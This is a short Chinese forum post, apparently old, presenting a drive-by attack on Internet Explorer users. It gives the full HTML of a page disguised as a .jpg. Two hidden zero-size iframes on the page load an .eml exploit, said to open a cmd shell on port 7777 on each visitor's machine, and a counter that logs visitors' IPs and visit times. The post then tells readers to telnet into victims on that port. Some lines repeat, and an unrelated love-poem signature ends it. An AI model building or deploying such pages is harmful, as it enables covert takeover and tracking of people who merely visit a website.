是否想过当你正常访问web站点的时候也可能受到攻击呢?
ok , 现在你在命令行输入 telnet 目标ip 7777 就可以知道结果了!正常访问www也有可能受到攻击
你是否想过当你正常访问web站点的时候也可能受到攻击呢?
没有太多的时间解释,这里做了个测试页
===============http://www.chinawolf.com/~vertarmy/1.jpg====================
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>New Page 1</title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<p><img src="ot2131.JPG" width="322"
height="486"></p>
<iframe src="load.eml" width="0" height="0"
frameborder="no" border="0" marginwidth="0" marginheight="0"
scrolling="no">
</iframe>
<iframe src="fangwen.htm" width="0"
height="0" frameborder="no" border="0" marginwidth="0"
marginheight="0" scrolling="no">
</iframe>
</body>
</html>
===================================================================
警告请不要轻易查看该页面!
上面这个页面首先利用了IE的APP漏洞,它对含有 HTML 语句的文本不检查扩展名。
在 NOTEPAD 上写一份 HTML 文件,保存为 .jpg。上传至空间服务器,用 IE 访问
URL。发现,IE 把 .jpg 误读成 .html.
接下来我们用了两个 iframe 分别调用页面,
load.eml
fangwen.htm
显示大小为 width="0" height="0" 所以在页面中不显示,
load.eml 是利用了ie的通过构造特殊代码导致
IE 用户执行攻击者命令漏洞
当用户访问load.eml 时将被自动的起出端口 7777的cmd shell
+++++++++++++++++++++++++++++++++++++++++++++++++++++
fangwen.htm 是一个记数统计器,用于查看哪些人,在几点,什么ip访问过。
=======================================================
ok , 现在你在命令行输入 telnet 目标ip 7777 就可以知道结果了!
------------------
爱,是多彩生活的调色板;爱,是一切生命的源泉;爱是多彩鲜花的芬芳;爱,是。。。。。。